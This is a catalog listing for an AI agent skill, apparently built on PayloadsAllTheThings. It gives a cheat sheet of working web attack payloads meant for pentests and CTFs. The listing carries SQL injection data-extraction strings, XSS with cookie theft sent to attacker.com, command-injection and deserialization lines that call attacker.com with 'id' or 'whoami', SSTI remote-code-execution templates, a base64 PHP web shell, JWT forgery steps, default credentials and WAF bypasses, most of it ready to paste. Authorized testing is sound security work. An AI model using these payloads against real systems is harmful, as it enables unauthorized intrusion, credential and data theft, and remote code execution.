Install
$ agentstack add skill-jph4cks-redhound-arsenal-payloads-all-the-things Open-source listing — not yet scanned by AgentStack. Follow the source repository for install instructions.
Security review
⚠ Flagged1 finding(s); flagged for manual review. · v0.1.0 How review works →
- • Prompt-injection patterns
- • Secret / credential exfiltration
- • Dangerous shell & filesystem operations
- • Untrusted network calls
- • Known-malicious package signatures
- high Dangerous shell/eval execution.
What it can access
- ● Network access Used
- ✓ Filesystem access No
- ● Shell / process execution Used
- ● Environment & secrets Used
- ● Dynamic code execution Used
From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.
About
payloads-all-the-things Agent Skill
When to Use This Skill
Use this skill when:
- The user needs injection payloads for a web application pentest or CTF
- Testing for SQLi, XSS, SSTI, SSRF, XXE, command injection, LFI/RFI, or deserialization
- Looking for WAF bypass strings or encoding tricks
- Delivering payloads via Burp Suite, curl, or automated tooling
- The user references PayloadsAllTheThings (PATT) or asks for a payload cheat sheet
What PayloadsAllTheThings Is
PayloadsAllTheThings is a community-maintained repository of attack payloads and bypass techniques organized by vulnerability class. It is a reference library — not a tool — used to hand-pick or adapt payloads for manual and semi-automated testing. Pair it with Burp Suite, curl, ffuf, or sqlmap to deliver payloads systematically.
Installation / Local Mirror
# Clone for offline access (recommended for engagements without internet)
git clone --depth=1 https://github.com/swisskyrepo/PayloadsAllTheThings.git
cd PayloadsAllTheThings
# Directory structure
ls
# Command Injection/
# Directory Traversal/
# File Inclusion/
# NoSQL Injection/
# Server Side Request Forgery/
# Server Side Template Injection/
# SQL Injection/
# XSS Injection/
# XXE Injection/
# ... (40+ categories)
# Quick grep for a payload type
grep -r "sleep(5)" "SQL Injection/"
grep -r "{{7*7}}" "Server Side Template Injection/"
SQL Injection Payloads
Detection / Error-Based
-- Classic detection
'
''
`
')
"))
' OR '1'='1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
-- Error-based (MySQL)
' AND extractvalue(1,concat(0x7e,version()))--
' AND updatexml(1,concat(0x7e,version()),1)--
-- Error-based (MSSQL)
' AND 1=convert(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
-- Time-based blind
' AND SLEEP(5)--
'; WAITFOR DELAY '0:0:5'-- -- MSSQL
' AND 1=(SELECT 1 FROM PG_SLEEP(5))-- -- PostgreSQL
Union-Based Extraction
-- Find column count
' ORDER BY 1--
' ORDER BY 2-- (increment until error)
-- Find injectable column (string context)
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 'a',NULL,NULL--
-- Extract data (MySQL)
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password,NULL FROM users--
-- File read via UNION (MySQL, requires FILE privilege)
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL,NULL--
Delivery with curl and Burp
# curl with URL-encoded payload
curl -s "http://target/item?id=1%27%20UNION%20SELECT%20user(),version(),NULL--"
# curl with POST body
curl -s -X POST http://target/login \
-d "user=admin'--&pass=x"
# Burp: send to Intruder, mark §injection§ position, load PATT wordlist
# Wordlist path after cloning:
cat PayloadsAllTheThings/SQL\ Injection/Intruder/Auth_Bypass.txt
cat PayloadsAllTheThings/SQL\ Injection/Intruder/FUZZ_INT.txt
XSS Payloads
Reflected / Stored
alert(1)
" onmouseover="alert(1)
' onfocus='alert(1)' autofocus='
alert(1)
alert(1)//
alert(1)
javascript:alert(1)
jaVaScRiPt:alert(1)
data:text/html,alert(1)
DOM XSS Sinks
// Common sink patterns to test in source code review
document.write(location.hash)
document.innerHTML = location.search
eval(location.hash.slice(1))
// Probe: append to URL hash
http://target/page#
http://target/page?q=
XSS to Cookie Exfil
fetch('https://attacker.com/log?c='+btoa(document.cookie))
Command Injection
Detection Strings
; id
| id
|| id
& id
&& id
`id`
$(id)
; sleep 5
| sleep 5
; ping -c 3 attacker.com
Blind OOB (Out-of-Band) Confirmation
# DNS exfil via curl/wget/nslookup
; curl http://$(whoami).attacker.com/
; nslookup `whoami`.attacker.com
; wget http://attacker.com/$(id|base64)
# Listen: python3 -m http.server 80 or use Burp Collaborator
Filter Bypass
# Space bypass
{IFS}id # $IFS in bash
cat${IFS}/etc/passwd
cat
]>
&xxe;
Blind OOB via DTD
">
%oob; %send;
%remote;]>
XXE in JSON Endpoints
# Change Content-Type to trigger XML parser
curl -X POST http://target/api/parse \
-H "Content-Type: application/xml" \
-d ']>&xxe;'
Server-Side Template Injection (SSTI)
Detection Polyglot
{{7*7}} → 49 (Jinja2/Twig)
${7*7} → 49 (FreeMarker/Thymeleaf)
→ 49 (ERB/JSP)
#{7*7} → 49 (Ruby/Slim)
{{7*'7'}} → 7777777 (Jinja2)
RCE by Engine
# Jinja2 (Python)
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{''.__class__.__mro__[1].__subclasses__()[396]("id",shell=True,stdout=-1).communicate()[0].strip()}}
{%for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__=='catch_warnings'%}{{c.__init__.__globals__['__builtins__'].eval("__import__('os').system('id')")}}{% endif %}{% endfor %}
# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
# FreeMarker (Java)
${ex("id")}
# ERB (Ruby)
Directory Traversal
# Basic
../../../etc/passwd
..\..\..\windows\win.ini
# Encoding bypasses
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252fetc%252fpasswd # double URL encode
%2e%2e%2f%2e%2e%2fetc%2fpasswd
....//....//etc/passwd # strip ../ bypass
..././..././etc/passwd # ../ strip bypass
# Null byte (old PHP)
../../../../etc/passwd%00.jpg
# Absolute path
/etc/passwd
C:\Windows\System32\drivers\etc\hosts
Authentication Bypass
SQL Auth Bypass
admin'--
admin'#
' OR 1=1--
' OR '1'='1'--
admin') OR ('1'='1
') OR 1=1--
1' OR '1' = '1
JWT Manipulation
# None algorithm attack
# Decode header, change alg to "none", remove signature
echo -n '{"alg":"none","typ":"JWT"}' | base64
# Forge: header.payload. (empty signature)
# HS256 with RS256 public key confusion
# If server uses RS256 but accepts HS256, sign with the public key as HMAC secret
Default Credentials (top combos)
admin:admin admin:password admin:1234
root:root root:toor admin:
test:test guest:guest operator:operator
File Inclusion (LFI/RFI)
# LFI wrappers (PHP)
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
php://input # + POST body as PHP code
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
# Log poisoning via LFI
# 1. Poison the log: curl -A "" http://target/
# 2. Include: ?page=/var/log/apache2/access.log&c=id
# RFI
?page=http://attacker.com/shell.txt
?page=\\attacker.com\share\shell.txt # Windows UNC
Deserialization Attacks
Java (ysoserial)
# Generate payload for Commons Collections gadget chain
java -jar ysoserial.jar CommonsCollections6 'curl http://attacker.com/$(id)' > payload.ser
# Deliver via HTTP POST, cookie, or parameter
curl -X POST http://target/api \
-H "Content-Type: application/x-java-serialized-object" \
--data-binary @payload.ser
PHP Object Injection
// Vulnerable code pattern: unserialize($_GET['data'])
// Craft malicious object manually or use PHPGGC:
./phpggc Monolog/RCE1 system id
./phpggc -u --fast-destruct Laravel/RCE11 system "curl http://attacker.com"
Python Pickle RCE
import pickle, os, base64
class Exploit(object):
def __reduce__(self):
return (os.system, ('curl http://attacker.com/$(id)',))
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
# Send as cookie or parameter value
CSRF Payloads
document.getElementById('f').submit();
fetch('http://target/api/change-email',{
method:'POST',
credentials:'include',
headers:{'Content-Type':'application/json'},
body:'{"email":"attacker@evil.com"}'
})
Burp Suite Integration
1. Send request to Repeater → manually test single payloads
2. Send to Intruder → load PATT wordlist files for fuzzing
Wordlists live in: PayloadsAllTheThings//Intruder/
3. Extensions:
- Active Scan++ uses PATT-style payloads automatically
- Copy As Python-Requests for curl reproduction
4. Match & Replace rules: auto-append SQLi probe to every GET param
Common Workflows
Enumeration → Exploitation Chain
# 1. Find parameter reflection
ffuf -u "http://target/search?q=FUZZ" -w PayloadsAllTheThings/XSS\ Injection/Intruder/xss-reflected.txt -mr "alert(1)"
# Try encoding variants from PATT
# URL encode, double encode, Unicode, HTML entity
curl -s "http://target/?x=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
curl -s "http://target/?x=\u003cscript\u003ealert(1)\u003c/script\u003e"
# Tamper scripts for sqlmap
sqlmap -u "http://target/?id=1" --tamper=space2comment,charencode,between
Troubleshooting
| Symptom | Likely Cause | Fix | |---|---|---| | Payload blocked by WAF | Signature match | Try encoding, case variation, comment insertion | | SQLi payload causes 500 | Syntax mismatch (DB type) | Identify DB type first; use DB-specific syntax | | SSRF returns empty | Outbound filtered | Try DNS-only OOB; check Collaborator/interactsh | | SSTI outputs literal {{7*7}} | Template engine not detected or escaped | Try alternate delimiters ${, #{}, `` | | XSS reflected but not executing | CSP blocking inline scripts | Check CSP header; look for JSONP/script-src bypass | ---
> Built by Red Hound InfoSec — On-demand offensive security expertise for SMBs. > 20+ years of Fortune 500 experience. Penetration testing, attack surface analysis, and security consulting. > > redhound.us | GitHub | Book a consultation
Source & license
This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.
- Author: jph4cks
- Source: jph4cks/redhound-arsenal
- License: MIT
- Homepage: https://redhound.us
Install and usage instructions live in the source repository linked above.
Reviews
No reviews yet — be the first.
Write a review
Versions
- v0.1.0 Imported from the upstream source.